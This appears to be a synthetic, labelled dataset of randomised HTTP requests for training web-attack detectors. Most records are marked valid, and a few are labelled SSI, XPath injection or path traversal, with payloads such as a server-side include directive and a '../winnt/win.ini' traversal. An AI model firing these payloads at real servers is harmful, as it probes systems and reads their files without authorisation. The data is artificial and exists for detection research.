Trailer: Warning
User-Agent: wenewNei (em9naEgm; eekooa3jj; jcpaGNc-; tBCRj.A)
UA-CPU: x86
UA-Disp: 505,4605,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 820x313
Via: 0.1 www.eg5tna9.js
Transfer-Encoding: pRme; pnoO2=ewAet
Upgrade: hoPa/4.4, Rhih/0.5
Warning: 509 32.174.131.157 "blmx" "Mon, 22 Dec 08 02:53:51 GMT"
X-Forwarded-For: 145.194.83.222
X-Serial-Number: 70476
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sE3Eosttatl=e<OseetaeunnT2EAn fr&ryin6=5&nhnmvueMss68hh=kKmL@AiBxkw&bae=98&leioge1sgreo5ie=32730366

End - Id: 4199
Start - Id: 31733
class: Valid
GET /t5TbeLuheejp8Dthe/rehrsomeotyxalju/gbpq6/terehiemrfmuudt/bZ@TOjwget/echovJQcNTF/Gc/5tHefas/weuhjssSom3wahsp/nhwxbi/A0lhaNvxcsbue/@wXVpse4.htm?pyineugrsobin=7340520&YF5alluIlEc-=04&ekr=lhoz+sceoe%3Cnetcat%26&link-D2rD9F.ap=n4oAoptwyolopenaon&ue=u%3FEtalocation%3F4opulN8e&dexei4vRowhrYa=pciR.75vNGHN&aoe=m8ujCQ&frtonaAotor=nsrlni&st=8&gonuifilb=68620860&yoei6eAirohW=4985192&hmyc=5883498992&esmIoaaeiesety=ttp%40&BDih=rahisatuAiPt5&Oaad0t=%40tir HTTP/1.1
Host: 67.65.170.59
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: en-rsueol, 6al-iax2dq
Cache-Control: no-transform
Client-ip: 13.117.255.218
Cookie: Asrlb=74069525;Ns=s\ael1/o;wzHu=697105
Cookie2: $Version="3"
Date: Fri, 09 Jan 04 16:12:46 CET
ETag: "yjtxWJhx9B1waodvUg"
Expect: rO0z
From: hSnrwf@ca6hdgec.biz
If-Modified-Since: Wed, 23 Jul 08 19:19:48 GMT
If-Unmodified-Since: Sun, 15 Feb 09 14:21:42 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 81
MIME-Version: 5.0
Pragma: h='htOhdta'
Proxy-Authorization: NTLM dHRzVmZ2cm1oeHRjc2lsdGtudHR0aXA3MG5vdHNlZG0=
Authorization: Digest response="d4DDFCa4e39D4A8bF7e2cECC34ACe6De"
Range: 5077-46,223-
Referer: http://Mcod6uri.ch/hui22re/tAaihs5t.pl
TE: gzip,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/5.1 (Machintosh; U; Mac OS X 1.5; pt-ag; rv:1.6.3) Gecko/05723777
UA-CPU: PowerPC
UA-Disp: 574,324,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 751x460
Via: HTTP/6.5 21.78.236.27, FTP/0.3 www.zhes5er.css:108, 2n4e/1.6 www.qsaza.gif:343
Transfer-Encoding: gzip
Upgrade: Nesagu/1.4
Warning: 655 www.5ege.shtml "eqstpn1youlwhxc" "Thu, 03 Jan 08 01:44:00 UTC"
X-Forwarded-For: 135.18.20.109
X-Serial-Number: 48619214669
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31733
Start - Id: 21797
class: Valid
GET /8e.CF/bnhashmim2/IF/1uGPQkZSE7C/lxL2gPss0h/Z2Gn3.zIxp_phpjaccept3g/exfatOqt/bonkL7h2/ehndnttIit.gif? HTTP/1.0
Host: www.oooiUH1a.st
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: gzip;q=0.8, compress
Accept-Language: meo6-oeQro4, ognoe-xaP4iele, et-reeU;q=0.2
Cache-Control: no-cache
Client-ip: 227.84.122.98
Cookie: Itb=t3&ahwem F bo6a;7ct=9881092
Cookie2: $Version="060"
Date: Wed, 10 Nov 04 01:56:12 GMT
ETag: "L5HhIZwc6obWrDxB"
Expect: 100-continue
From: qn7fi@stAorh.org
If-Modified-Since: Wed, 02 Dec 09 18:31:13 CET
If-Unmodified-Since: Sun, 19 Nov 06 22:03:57 GMT
If-Match: "EThuBWMW4-9Ib5Cx3Ov"
If-None-Match: *
If-Range: *
Max-Forwards: 1844
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: NTLM YlRhZ285aHJjc3VhbWJOdHN0b2hnaTl0MGJsY25ycHlkbmlBYnNzdA==
Authorization: hqtl tth8p=pmsdc
Range: -34,6-5773,-2615
Referer: /yicas.png
TE: chunked
Trailer: Max-Forwards
User-Agent: Mozilla/4.3 (X11; U; SunOS sun4u 6.3; x1-sa; rv:9.9.4) Gecko/03089146
UA-CPU: StrongARM
UA-Disp: 488,0035,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 9055x3634
Via: FTP/8.9 219.204.193.147, 4.5 www.in2ota.css, 6.1 www.e7in.html
Transfer-Encoding: deflate
Upgrade: lmt3e/5.6, eogjeo/0.1
Warning: 281 www.mehu.png:9321 "ryoermnI0lwry" "Sun, 27 Nov 05 22:05:35 CET"
X-Forwarded-For: 221.81.223.145
X-Serial-Number: 8436166703567420278
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21797
Start - Id: 3352
class: Valid
GET /nulllWfGICbservicesAsystem1Q.html? HTTP/1.0
Host: www.NetxIeerW.be
Connection: ndclet
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: tjnHrr-oeihd, cc-du;q=0.4
Cache-Control: no-transform
Client-ip: 99.53.105.88
Cookie: 4oii1tvsxf=[raset::mstdinwtimgT;Ss6se=tee;HqwQbZzju=2308994;al=Awehto0re5e
Cookie2: $Version="8"
Date: Sat, 14 Oct 06 10:38:49 UTC
ETag: W/"Ib6iWSthAB9fa1oIj"
Expect: sPorrn6=xohsaaT;reOiamAI=tonif
From: rotrm@prr0Uaen9A.net
If-Modified-Since: Wed, 23 Nov 05 08:58:11 UTC
If-Unmodified-Since: Fri, 25 Sep 09 12:48:37 CET
If-Match: "1vnFa.QZSx7eoWaft"
If-None-Match: "@3pVkT245r@Mmt1HRNym"
If-Range: Sat, 17 Apr 04 08:15:56 UTC
Max-Forwards: 31
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: r2ymao sdha=rh3ozee
Authorization: Basic a0VzZTY6c2lnMHRodHQ=
Range: -47,44635-002359,02127-
Referer: http://dkti8I.it/poei9n/prek/aejxaeS/ms3oars/sfedha7.cgi
TE: trailers,trailers,gzip;q=0.9
Trailer: Referer
User-Agent: dTloeokx
UA-CPU: x86
UA-Disp: 351,552,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8795x2718
Via: 6.6 www.sUas6kz.js, 0.2 www.1AaihsiA.css
Transfer-Encoding: teie; spHteam=wter
Upgrade: yeec2/5.6, ruid/6.9, hk5h/6.6, gr6/5.3, hwts3p/7.9
Warning: 318 www.thxeOtH.gif "5umistbtjodse20isns" 
X-Forwarded-For: 253.99.67.7
X-Serial-Number: 8869070380
----: ---------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 3352
Start - Id: 39303
class: SSI
GET /uSAgNd6RjCz388LJ/hal/6ozydossob/ktTta/qn1R.lx@rPfkQro/nl/oad8gItXee.cfm?nrDoaiediege0nI=4253140&mer8trwejtw=risjcdo&iueihalv2etexe=i%29from&Htotest=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&WbPNy=e&ncdaothlr=dn+&e9teat8r6ecoTa=2716&Uatfzg7titdisea=Bwindow.openny&t8atE=6046&rLWsam=sss HTTP/1.0
Host: 168.174.95.253:80
Connection: hotl7np4
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: cdsceDyi-eme;q=0.4, nnghtt-tw5li6aa;q=0.8, c6T-ornsGef, lmqw-c4Pestr;q=0.0
Cache-Control: only-if-cached
Client-ip: 138.46.179.184
Cookie: aEeo2Elermw=3538;obka4=iBmjYaaHluA8;fbgsoundMK_KU5V0Z=jceteoopasswd0Isen;nmtlnccAaeiA=wc6UtI;ssc9hcegud4HNae=3z aylfewget seEt~ v';e9qr1sd=o@io>hbb
Cookie2: $Version="461"
Date: Tue, 28 Jul 09 20:23:08 GMT
ETag: W/"t6VPSZigbyYadImOF6e"
Expect: iGetlsru
From: rdres4oc@woem.de
If-Modified-Since: Thu, 31 Jan 08 11:47:45 GMT
If-Unmodified-Since: Tue, 23 Jun 09 10:13:20 GMT
If-Match: *
If-None-Match: *
If-Range: "7DYUllIPglxX0x09"
Max-Forwards: 4
MIME-Version: 8.9
Pragma: D1ole='2t'
Proxy-Authorization: Basic bDN0bGhzOmVldEdkZXI=
Authorization: NTLM ZWhlbGFvaW5xZWpodHluaWFldW9tZWVPaW5wRXJoNGxHdHRqbnNhYTk=
Range: 9225-57239,301-8
Referer: /onaed/idhtt.cgi
TE: trailers,deflate;q=0.6
Trailer: Accept-Charset
User-Agent: Mozilla/2.7 (Machintosh; U; Mac OS X 8.6; sa-ew; rv:8.5.0) Gecko/65577970
UA-CPU: MIPS
UA-Disp: 646,7509,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 5234x268
Via: unmc/1.0 59.169.11.105, 4.0 235.210.94.78
Transfer-Encoding: ks2h1; sdgoons=srt4ty
Upgrade: asiM/9.3
Warning: 228 www.sonottir.jpg "rhCetiasi8AntEe7B" "Tue, 08 May 07 07:56:15 GMT"
X-Forwarded-For: 229.251.127.187
X-Serial-Number: 559061405127813998
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39303
Start - Id: 3774
class: Valid
GET /MeoJgNnullO/updateH_/7tstn2iptl/os5huneoe/asYHwnetcatuV.gif?UDtEqein=789812&sjo=204772&asfhpaoeeio8o=hLmO0r&dekle9stp=28281647&znlriYs=fotmMntreshutdownakiia&ndna=mdocumente HTTP/1.0
Host: 75.1.222.235
Connection: keep-alive
Accept: video/*, application/*
Accept-Charset: x-mac-roman, x-mac-cyrillic
Accept-Encoding: gzip;q=0.9, deflate, identity;q=0.5
Accept-Language: *
Cache-Control: no-transform
Client-ip: 219.33.16.220
Cookie: 4iaig2iotdol=fX@;_icmdMsb=hrp oc:2h;boit8ihrA9t4t9n=2;uIczU2zbodytb=070168969;passwdov4sam=ruXyt
Cookie2: $Version="851"
Date: Sun, 24 Aug 08 16:45:33 UTC
ETag: W/"J9zVxeYsN18fjLtQhc"
Expect: msle9rna=tnnrdc
From: ueatims@oatosfu.net
If-Modified-Since: Mon, 09 Feb 09 12:25:50 CET
If-Unmodified-Since: Mon, 14 May 07 24:30:43 GMT
If-Match: "Z2blLjKCvmP@9fQ6ss4k"
If-None-Match: "ewVhSrT73W2r.R4qKb"
If-Range: Sat, 30 Aug 08 04:30:19 UTC
Max-Forwards: 3
MIME-Version: 4.3
Pragma: vErs=uo
Proxy-Authorization: d7tg8 ePiym=ryti
Authorization: Basic Y3hhcnRlOmVlNTRsaA==
Range: -264,52-
Referer: http://www.dgoudei.org/hOL4Ee8r/e9drdcOf.tiff
TE: trailers,chunked,trailers
Trailer: Transfer-Encoding
User-Agent: ri1nW/7.6.1
UA-CPU: PowerPC
UA-Disp: 599,9039,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0475x7705
Via: 8.6 7.92.49.237, 4.2 www.rtke.css
Transfer-Encoding: gzip
Upgrade: ae6/0.7, dwb/4.2, ltsri/6.3, aNt/0.1, 4t3eGn/0.0
Warning: 946 207.80.85.43 "ioeyradhgStlaUn1wz" 
X-Forwarded-For: 2.28.238.117
X-Serial-Number: 68867877
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3774
Start - Id: 21143
class: Valid
GET /su9EUlmr2c4eirrebv/4rnehA8n/bINgXuJhomeuw/rRefttKsi0hoh/lclgvml4/ueEs4ooltr/mVc_E72LOB/oIndX208swtsjHi/eVY6EIAcrlBBiw/dG-6tq.tiff?vidzrit=cye&onraedtoeyi=5&i5dmpkRoaens=%25dsbi&fCv4nenn=26139772&iufxrhsesq=ropennds HTTP/1.1
Host: 141.212.4.164:80
Connection: keep-alive
Accept: video/*;q=0.5, image/*;q=0.8, application/x-tar
Accept-Charset: x-mac-icelandic
Accept-Encoding: gzip;q=0.7, gzip;q=0.3
Accept-Language: i0AA-o0, t-ior;q=0.1, 2e-sf, C-A2ousb, d-i
Cache-Control: no-cache
Client-ip: 139.120.122.69
Cookie: bnw1eeeC=sAOe
Cookie2: $Version="300"
Date: Sun, 30 Oct 05 22:01:03 UTC
ETag: W/"CSwd.3Y5bwdk5HFCrpwd"
Expect: tetnMsTh
From: dhehtais@ahehpggov.uk
If-Modified-Since: Tue, 31 Mar 09 03:31:20 UTC
If-Unmodified-Since: Mon, 21 Dec 09 23:13:44 CET
If-Match: "Q.QGYeeRGDYa4E93T"
If-None-Match: *
If-Range: "aHZ7z5Yz3h3Qqi@.RY0"
Max-Forwards: 83
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: spnetr snSiU=Eaaulsc
Authorization: nrecrW ecivis=tIsdelOm
Range: 3-
Referer: http://www.mtnoeed.net/olrv/pmoc2g/1Vllnfa/sgjoinoa/Eaemlizc.cfm
TE: trailers,deflate
Trailer: Connection
User-Agent: Mozilla/7.2 (compatible; MSIE 0.1; Win 9x; ic0koab; lg0srDytst)
UA-CPU: StrongARM
UA-Disp: 3826,0274,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 739x758
Via: 8.3 www.aeesdL.js
Transfer-Encoding: compress
Upgrade: olhOla/3.4, eiCcnJ/2.6, t0pcs/1.5, eshn/2.6
Warning: 554 www.g0den7.shtml "imsucel" "Thu, 03 May 07 11:10:04 CET"
X-Forwarded-For: 121.247.72.172
X-Serial-Number: 9779680
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21143
Start - Id: 3648
class: Valid
GET /0uhsnrgbjsiEnj3dybd/N5gsntg9o5oranm9jpc/atnvi.htm?wo6A-script6=Azjeroot&teks=4openm1e&segsreeT6=usacceptM&tcnuw881dofo=ta%3Dtt HTTP/1.1
Host: 160.219.183.225
Connection: anter
Accept: */*;q=0.2
Accept-Charset: utf-8, windows-1258
Accept-Encoding: 
Accept-Language: eSo-siE;q=0.7, veuaani-shld;q=0.7, fxetsieg-a
Cache-Control: no-cache
Client-ip: 79.185.159.211
Cookie: ylit=41863;cylgnbnrBAiTp=adhfrom
Cookie2: $Version="8"
Date: Tue, 25 May 04 20:23:40 CET
ETag: "fhRRsrJolpUV-i0BhFM"
Expect: 100-continue
From: iaeitS7@hsAh8.fr
If-Modified-Since: Thu, 29 Apr 04 15:58:34 UTC
If-Unmodified-Since: Sat, 28 Oct 06 20:20:22 GMT
If-Match: "qz5HeQtV64E3L8WH"
If-None-Match: "XnlKnea.z2hsPR8"
If-Range: "UmIo.hchiAotHECg"
Max-Forwards: 25
MIME-Version: 8.4
Pragma: 2Qoo2='ze'
Proxy-Authorization: Digest opaque="nde1rea"
Authorization: Basic dG5lYTp1cmhv
Range: 266128-
Referer: http://leuherm.cz/oozftbet/lngY54ze/euksj/eh48iI.tar
TE: chunked;q=0.5
Trailer: Cache-Control
User-Agent: Mozilla/8.5 (X11; U; SunOS sun4u 6.1; mi-c8; rv:6.0.1) Gecko/49557371
UA-CPU: StrongARM
UA-Disp: 409,337,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1057x068
Via: 4.6 114.114.89.203, 2.0 www.ie6bl.html, 0.8 100.52.186.169
Transfer-Encoding: compress
Upgrade: dYoU/6.2, ttb/9.7
Warning: 615 www.rhpe.shtml "litiIofi1" 
X-Forwarded-For: 153.114.223.45
X-Serial-Number: 02989198199377
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3648
Start - Id: 5410
class: Valid
PUT /e_4h-2t.jpeg? HTTP/1.1
Content-Length: 296
Content-Language: qEen,rImiRob
Content-Encoding: compress
Content-Location: http://www.rstir.it/fHeeh1t/tnyten/gtek5td/35iSfna.doc
Content-MD5: c2VlZWJvYWxld3Noa2FqeA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 16 Feb 04 03:19:33 CET
Last-Modified: Wed, 07 Feb 07 01:38:57 CET
Host: 50.154.129.105
Connection: close
Accept: text/plain;q=0.6, image/png;q=0.9
Accept-Charset: x-mac-chinesetrad, us-ascii;q=0.6, cp-932;q=0.0, x-mac-icelandic;q=0.2, iso-8859-8;q=0.8
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.8
Cache-Control: min-fresh=2
Client-ip: 6.2.186.191
Cookie: q8rm0Dh.18w=ps6;px8tS=0rge4;uWzM=sa3rrl'28s9 mh;ENBPA5=)2i
Cookie2: $Version="700"
Date: Tue, 30 Jun 09 07:31:00 CET
ETag: W/"vt.0GkL2HP63RDUQ0If"
Expect: uools=kenw;bnaue4
From: aoaomzge@wiejdTf.ch
If-Modified-Since: Mon, 16 Oct 06 18:58:38 UTC
If-Unmodified-Since: Mon, 12 Jan 09 14:56:37 GMT
If-Match: "-ZHIAfDl.j3cshr55"
If-None-Match: *
If-Range: "weOpoSZH@8KawlzA.N-"
Max-Forwards: 4
MIME-Version: 4.5
Pragma: 3='tiymO'
Proxy-Authorization: NTLM YWt3SHRhbmRlOGlzaWM3NnRhdG5oMFM2b25ocnRvMHJkeURyc2VhZUFkMWk=
Authorization: aa9hgE haNeibe=taxo6
Range: 33401-381,35239-,-73
Referer: http://simne.fr/teeohd/nae5/pltdysgw/kshd/ulxen2.jpg
TE: gzip;q=0.8
Trailer: Proxy-Authorization
User-Agent: Mozilla/9.5 (Windows; U; Windows NT 0.3; Ti-ea; rv:0.3.0) Gecko/69583984
UA-CPU: x86
UA-Disp: 958,782,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 237x186
Via: aheh/6.8 158.248.138.71:979
Transfer-Encoding: compress
Upgrade: s4syeh/8.2, Palt/1.0
Warning: 758 183.182.45.114 "ztx0agr" 
X-Forwarded-For: 13.159.36.160
X-Serial-Number: 759836500
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

adkc=9877&oacv=490287869&mIX=9Brd.b7t9&Dperl8yform2LF2J=62350&ete9wDzes=xmllusrtadbv~c0aimebetweenincludef4&27oerSsyeCbuj=deihl~vgawu&5iocer5Ist=49&leB=u3wtrnrcpamr|n&kGG5uY3processing-instruction=eriMoiTo&u0feyTnkiepmbgd=ho~vce&SlzwtgdhscenNvh=blxetbo'eIt5&ntpaneani8lm=O&n5uae=cEeeh8m

End - Id: 5410
Start - Id: 28848
class: Valid
GET /oL/64Xa/vMW.M5MshutdownuTf4/z6QWiTs9lLrM/aZIs99FncjyO1n/ronxph4mJ/JbNetcS91.bin?tuyxsjctdfm3v9=mr%25utosdu%28+e%3Csf%5Cla&sGeterps1eha=yG%5Dtee%3Daccess_logadf1g&regs=18152&qoSmes=ehatFsy- HTTP/1.1
Host: 108.189.104.98
Connection: fmeoe
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: compress;q=0.9, deflate;q=0.6
Accept-Language: u-ei;q=0.3, b3bighnk-bpitosa;q=0.9, aei4oa1w-Kaulea5;q=0.0, ee-Yehmow;q=0.0, pTuq-sa
Cache-Control: min-fresh=47330
Client-ip: 180.229.35.171
Cookie: rottaoiiaT0qf=4707;ioylpqm=9lrnrEatr2;ceodbenakhOdoNb=215298;ana=4999;budtcuhlel2b=03;rh=et
Cookie2: $Version="01"
Date: Fri, 08 Aug 08 20:34:16 UTC
ETag: W/"D-LFA3Yi1z1Rsvxri"
Expect: 100-continue
From: 4zbw@syof.net
If-Modified-Since: Mon, 04 Sep 06 13:15:39 CET
If-Unmodified-Since: Tue, 13 Apr 10 18:39:10 GMT
If-Match: "TjJUPHqc2_ZkldJfSR9"
If-None-Match: "tbPhsBaoGT9X8@C"
If-Range: Sat, 01 Dec 07 03:11:44 UTC
Max-Forwards: 926
MIME-Version: 0.3
Pragma: 9Thq9r1='oks4mtae'
Proxy-Authorization: NTLM Mmhzb21iY2FuY2h6aGJpbnZqZWU1cHFmanhkd2psSGduNmRvYXR0ZW51bjQ=
Authorization: eeeae stTE=trhaWn
Range: 69-
Referer: http://tklt.fr/etkaevn/rhmna/vhobcm.jsp
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/3.6 (Machintosh; U; Mac OS X 3.3; 91-ao; rv:8.0.9) Gecko/73361768
UA-CPU: x86
UA-Disp: 3377,8553,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 122x5513
Via: HTTP/2.0 79.255.74.131, 1.0 www.nniht.jpg
Transfer-Encoding: compress
Upgrade: wQghe/7.0, add/6.9
Warning: 774 www.ndtrlnd.html:61057 "LoxMoewimo" "Wed, 19 Apr 06 19:33:49 UTC"
X-Forwarded-For: 102.241.28.31
X-Serial-Number: 15281
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28848
Start - Id: 23576
class: Valid
GET /serigittwRti7c1/62bPg1Zcato0Kpt.pl? HTTP/1.0
Host: 64.246.192.27
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: windows-874;q=0.4, windows-1252;q=0.6, x-mac-arabic, windows-1254, euc-kr;q=0.9
Accept-Encoding: compress, deflate;q=0.0, identity, deflate, identity
Accept-Language: *;q=0.2
Cache-Control: ts='h9h'
Client-ip: 227.209.221.223
Cookie: netnlS1ts=0355
Cookie2: $Version="95"
Date: Mon, 09 Nov 09 15:44:19 CET
ETag: "NTdHbgXGAcqVmaz3"
Expect: 100-continue
From: Aial5osa@Mysrie.uk
If-Modified-Since: Sun, 04 Mar 07 09:51:01 GMT
If-Unmodified-Since: Fri, 30 Jul 04 22:43:36 UTC
If-Match: *
If-None-Match: *
If-Range: "X6j9Tq53by2BN7zz"
Max-Forwards: 4113
MIME-Version: 7.1
Pragma: awfocrm='leE2hoi'
Proxy-Authorization: NTLM bHNCaXFhYWhlam9zbnQzaWVjY2lyaXN0dW9hbWV0dWFmdEFv
Authorization: Basic eWk4MGNlOnRnb3c=
Range: 62145-4,-94,41-
Referer: /wh9k0pce.pdf
TE: gzip;q=0.4,chunked;q=0.5
Trailer: Accept-Charset
User-Agent: Mozilla/6.6 (Machintosh; U; PPC 2.5; kc-ia; rv:4.0.3) Gecko/90738045
UA-CPU: StrongARM
UA-Disp: 990,4504,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 4426x0282
Via: FTP/2.0 www.st9A.html, 8.5 248.245.94.238, 6.7 www.ele6loie.shtml
Transfer-Encoding: compress
Upgrade: yhlh/5.7, nern/8.3
Warning: 651 144.9.93.192:287 "xetiPfossquidaftieM" "Sat, 09 Aug 08 08:49:36 CET"
X-Forwarded-For: 73.5.140.170
X-Serial-Number: 1009110184973666911
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23576
Start - Id: 49690
class: XPathInjection
GET /eisedem/zjySc/dx/oosy/JhavinghB-27e/rS9fTQIzMY/mtl9nm/e2rO8Etntstrztr/trZJcw2ChA/hRl/lpYi2waac/eociit7nwoOe8hIq.cgi?8nX2=e.rwYP&2eesaabclxme7=e1r&zia2emsfi=tmejuhSilEO9&hltewmsr8ud=%40xosblsy78erexecec%25uto+&dyioofsyusr=2209&7ioaelfbretahtn=rnt%27%5D++++%7C+++P++++%7C++%2F%2Fuser%5B++++name%2Ftext%28%29+++%3D%272ui&SdyaEo=eza&DlFO1Xaccess_log5=13ey&aoowa=w%40kD&sTCukn8st6tiiib=6%24o%24lEesn0does%27ema&lsyonAuotMshb=21699219&orozcBlso=eR6K&ede6rsrXeotf4M=691&RnntT=F0rn%7Ewrsock_streamu%7C&ety7er=759 HTTP/1.0
Host: www.lmdnxot3tO.net
Connection: onnrri
Accept: image/gif;q=0.2, image/jpeg, application/*
Accept-Charset: *;q=0.3
Accept-Encoding: deflate, compress
Accept-Language: oHn0ua-erwtdtn;q=0.6, egsnga-ltmi3iIn, dEc-ifrtl;q=0.5
Cache-Control: only-if-cached
Client-ip: 108.128.7.126
Cookie: ldeq0h=ysLA6bB3CnA;uw=sN2wA;q6ejseedtq10s=3594552493;oJniD4VuH=slhasIansmrRted1
Cookie2: $Version="176"
Date: Fri, 20 Aug 04 13:23:37 UTC
ETag: W/"rxcndMh1TvLBsYH"
Expect: Aahhoh
From: h9cdqge@khpde.com
If-Modified-Since: Tue, 24 Jul 07 12:56:21 UTC
If-Unmodified-Since: Tue, 20 Feb 07 18:45:47 GMT
If-Match: *
If-None-Match: ".rzd6rqmI.@wp3BRxDX"
If-Range: *
Max-Forwards: 4117
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: NTLM b2RuZWV0bGVubm5nb2huU3diYWZibW9uc3BlRHp2dG1jYXdiZWNsM0FlNXM=
Authorization: Basic amFucm86YWVOdW9l
Range: -394122
Referer: /T9elun.php4
TE: trailers,chunked,trailers
Trailer: Range
User-Agent: Mozilla/1.5 (Machintosh; U; Mac OS X 8.1; eE-ef; rv:6.3.8) Gecko/21355141
UA-CPU: StrongARM
UA-Disp: 2722,5111,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5244x685
Via: HTTP/6.2 165.5.134.195, hhe/3.6 www.Yaein5.htm:9827, 9.7 www.eslld2F6.png
Transfer-Encoding: compress
Upgrade: reeei/0.0, w2wde/2.4, e58a/5.6
Warning: 928 www.sea4hf7.png:6529 "guetn6bIulNebhuhnEd" "Fri, 08 Apr 05 24:10:56 UTC"
X-Forwarded-For: 76.177.20.101
X-Serial-Number: 7269529706090781
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49690
Start - Id: 45059
class: PathTransversal
GET /.nsf/../winnt/win.ini? HTTP/1.1
Host: 232.129.238.40:76
Connection: close
Accept: video/*;q=0.4, audio/*;q=0.4, audio/*
Accept-Charset: x-mac-roman, x-mac-turkish
Accept-Encoding: *
Accept-Language: 1Tn-wrne, wqrso-dL, l-taIn
Cache-Control: no-store
Client-ip: 4.109.212.12
Cookie: YmailPR5o1.wHIe=aD4ys%ieroptZ$e\ozms;mzre=38150;hi3bRn=42952258;elrw0jwtrohE=hzpKys
Cookie2: $Version="345"
Date: Mon, 02 Feb 04 10:30:01 GMT
ETag: W/"VI05iHgMeDWsSIG"
Expect: ewaf=sngi;Nedtm=ctaEaQif
From: hyrpijtS@yytf9mx9es.net
If-Modified-Since: Wed, 10 Sep 08 08:41:58 GMT
If-Unmodified-Since: Thu, 27 May 04 23:47:01 GMT
If-Match: "rIGsar_3oCllg8h0ZHB"
If-None-Match: "GoqdBXduDrkbwhfn6"
If-Range: Sun, 09 Jan 05 05:47:04 CET
Max-Forwards: 89
Pragma: qRA='SeEme'
Authorization: Basic aTluZTp0NjJ3cw==
Range: 09453-71450,00-30
Referer: /txeD.js
TE: trailers,trailers,deflate
Trailer: Host
User-Agent: pWd_aIC http://www.Sjbs.cz
UA-CPU: 68000
UA-Disp: 7777,3718,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 127x929
Via: FTP/3.0 www.es9o.html, 6.9 www.1fpntt.css, 3.8 82.93.61.138:2
Transfer-Encoding: gzip
Upgrade: sE8t/1.6, Nhe/7.5, xdp/3.6, iiAp/5.2, r0rr/5.2
Warning: 514 241.201.245.243 "Aasvtsf2rhfAiuhrred" 
X-Forwarded-For: 138.45.117.11
X-Serial-Number: 098890669103739278
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45059
Start - Id: 4786
class: Valid
POST /hYjc6ir@2bt9qDHj/U0VFOexec4N0z/n8DKfIa_D/saZy2oHMJsd-xAlL6Z9g/pnrcose0reraaten/ehanhheeahloprar/rNln5snXhhejaeeHl/tQJl0pSO4M3CxZ7l9_W.htm? HTTP/1.0
Content-Length: 102
Content-Language: iueenc
Content-Encoding: compress
Content-Location: http://www.QlulsO.org/hdh5/biedOpn/eyclI.exe
Content-MD5: cGVhcmFicmZhd0tUdHVvaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 17 Aug 06 05:16:50 CET
Last-Modified: Mon, 09 Apr 07 17:52:16 UTC
Host: www.Ksc74sabs.com
Connection: close
Accept: audio/*;q=0.4, video/*;q=0.2, video/mpeg;q=0.5
Accept-Charset: *
Accept-Encoding: identity;q=0.8
Accept-Language: t-gp;q=0.7, IEdan-inmb;q=0.6
Cache-Control: max-age=87
Client-ip: 187.93.237.97
Cookie: acecmdnLzna=07868;nezboltCUltw=ht0;prae=orapsr+oet/cOstdin;udvCtEGnetcat_=56474831
Cookie2: $Version="9"
Date: Sun, 02 Aug 09 23:35:08 UTC
ETag: W/"sHkaUAzdlA81iGEiB5"
Expect: erePlwnn=tboel5n;75rtreh
From: 9mwiN@6woe1E.net
If-Modified-Since: Mon, 18 Feb 08 12:43:15 CET
If-Unmodified-Since: Sun, 02 Apr 06 09:50:30 CET
If-Match: *
If-None-Match: "XjejdQqNjI9Ai3m"
If-Range: Wed, 06 Jan 10 22:55:38 CET
Max-Forwards: 46
MIME-Version: 3.1
Pragma: qei=9ovfe
Proxy-Authorization: Digest uri=http://www.efttzis.be/nlrez/ltpeh/rkieoIj.gif
Authorization: wsrgco euerToht=tdrirs
Range: 1757-72,-28304,0-
